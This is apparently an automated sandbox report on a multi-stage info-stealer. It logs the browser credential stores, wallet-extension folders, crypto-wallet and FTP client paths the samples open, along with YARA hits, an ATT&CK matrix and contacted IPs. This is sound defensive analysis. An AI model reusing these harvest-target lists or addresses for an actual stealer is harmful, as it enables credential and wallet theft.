                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe Directory queried: C:\Users\user\Documents\FACWLRWHGG
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe Directory queried: C:\Users\user\Documents\MQAWXUYAIK
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe Directory queried: C:\Users\user\Documents\MQAWXUYAIK
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe Directory queried: C:\Users\user\Documents\FACWLRWHGG
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Directory queried: C:\Users\user\Documents\XQACHMZIHU
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Directory queried: C:\Users\user\Documents\FACWLRWHGG
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Directory queried: C:\Users\user\Documents\MQAWXUYAIK
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Directory queried: C:\Users\user\Documents\QVTVNIBKSD
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: number of queries: 1001
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: number of queries: 1001
                                Source: Yara matchFile source: 0000005F.00000003.2934600615.0000000001328000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000054.00000003.2941270961.0000000001355000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000005F.00000003.2934892594.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000054.00000003.2940333141.0000000001302000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000005F.00000003.2960705475.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000054.00000003.2942245341.000000000135B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: D1UL0FG.exe PID: 6716, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 8ZVMneG.exe PID: 7744, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: d0ef52de9f.exe PID: 7216, type: MEMORYSTR

                                Remote Access Functionality

                                Source: Yara match | File source: 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000006.00000003.2986166870.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000005.00000003.2469304797.0000027326167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000005.00000003.2469304797.0000027326165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000006.00000002.2992431014.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000006.00000003.2983797651.000001FA2EDC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: Process Memory Space: D1UL0FG.exe PID: 5160, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: D1UL0FG.exe PID: 6716, type: MEMORYSTR
                                Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI51602\rarreg.key, type: DROPPED
                                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: 8ZVMneG.exe PID: 7744, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: d0ef52de9f.exe PID: 7216, type: MEMORYSTR
                                Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe, type: DROPPED
                                Source: Yara match | File source: Process Memory Space: D1UL0FG.exe PID: 6716, type: MEMORYSTR
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_006BEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,3_2_006BEC48
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_006BDF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,3_2_006BDF51
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8752B62 bind,WSAGetLastError,6_2_00007FF8A8752B62
                                Source: Yara match | File source: 85.2.FuturreApp.exe.920000.0.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 85.2.FuturreApp.exe.6bfe0000.5.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 81.3.m9sfEU9.exe.31f4800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 85.0.FuturreApp.exe.920000.0.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 85.2.FuturreApp.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 85.2.FuturreApp.exe.6c000000.6.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 85.2.FuturreApp.exe.6bd30000.3.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 85.2.FuturreApp.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 00000055.00000000.2642607921.0000000000922000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000055.00000002.7287032107.00000000111E1000.00000004.00000001.01000000.00000023.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000055.00000002.7276259050.0000000000922000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                Source: Yara match | File source: Process Memory Space: m9sfEU9.exe PID: 7732, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: FuturreApp.exe PID: 1972, type: MEMORYSTR
                                Source: Yara match | File source: C:\Users\Public\Netstat\pcicapi.dll, type: DROPPED
                                Source: Yara match | File source: C:\Users\Public\Netstat\FuturreApp.exe, type: DROPPED
                                Source: Yara match | File source: C:\Users\Public\Netstat\TCCTL32.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Users\Public\Netstat\PCICHEK.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Users\Public\Netstat\HTCTL32.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED
                                MITRE ATT&CK matrix, tactic columns (left to right): Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
                                Windows Management Instrumentation
                                1
                                DLL Side-Loading
                                1
                                DLL Side-Loading
                                1
                                File and Directory Permissions Modification
                                2
                                OS Credential Dumping
                                2
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                1
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                Data Encrypted for Impact
                                CredentialsDomainsDefault Accounts12
                                Native API
                                1
                                Scheduled Task/Job
                                112
                                Process Injection
                                4
                                Disable or Modify Tools
                                LSASS Memory23
                                File and Directory Discovery
                                Remote Desktop Protocol41
                                Data from Local System
                                1
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts222
                                Command and Scripting Interpreter
                                121
                                Registry Run Keys / Startup Folder
                                1
                                Scheduled Task/Job
                                21
                                Deobfuscate/Decode Files or Information
                                Security Account Manager247
                                System Information Discovery
                                SMB/Windows Admin Shares1
                                Clipboard Data
                                1
                                Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Scheduled Task/Job
                                Login Hook121
                                Registry Run Keys / Startup Folder
                                4
                                Obfuscated Files or Information
                                NTDS10101
                                Security Software Discovery
                                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts4
                                PowerShell
                                Network Logon ScriptNetwork Logon Script14
                                Software Packing
                                LSA Secrets3
                                Process Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                Timestomp
                                Cached Domain Credentials471
                                Virtualization/Sandbox Evasion
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                DLL Side-Loading
                                DCSync1
                                Application Window Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                Masquerading
                                Proc Filesystem1
                                Remote System Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                Modify Registry
                                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron471
                                Virtualization/Sandbox Evasion
                                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd112
                                Process Injection
                                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                Behavior Graph ID: 1578555 | Sample: file.exe | Startdate: 19/12/2024 | Architecture: WINDOWS | Score: 100
                                Signatures on the start node: Found malware configuration; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 25 other signatures
                                Process tree recovered from the behavior graph (node numbers are the graph's own; the bracketed numbers after a process name are the graph's created-registry-value / created-file counters as shown):
                                12 file.exe [5]
                                    dropped: C:\Users\user\AppData\Local\...\skotes.exe, PE32; C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII
                                    signatures: Detected unpacking (changes PE section rights); Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to evade debugger and weak emulator (self modifying code); Tries to detect virtualization through RDTSC time measurements
                                    20 skotes.exe [4 89]
                                        contacts: 185.215.113.43 WHOLESALECONNECTIONSNL Portugal; 185.215.113.16 WHOLESALECONNECTIONSNL Portugal; 31.41.244.11 AEROEXPRESS-ASRU Russian Federation
                                        dropped: C:\Users\user\AppData\...\85070a414c.exe, PE32; C:\Users\user\AppData\...\194df6b68b.exe, PE32; C:\Users\user\AppData\...\b8dc7af2d8.exe, PE32; 43 other malicious files
                                        signatures: Uses cmd line tools excessively to alter registry or file data; Creates multiple autostart registry keys; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 3 other signatures
                                        25 D1UL0FG.exe [22]
                                            dropped: C:\Users\user\AppData\...\unicodedata.pyd, PE32+; C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+; C:\Users\user\AppData\Local\...\select.pyd, PE32+; 16 other files (15 malicious)
                                            signatures: Antivirus detection for dropped file; Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; 2 other signatures
                                            36 D1UL0FG.exe [1 108]
                                                contacts: 208.95.112.1 TUT-ASUS United States; 149.154.167.220 TELEGRAMRU United Kingdom; 172.217.19.227 GOOGLEUS United States
                                                signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); Modifies Windows Defender protection settings; 5 other signatures
                                                52 cmd.exe
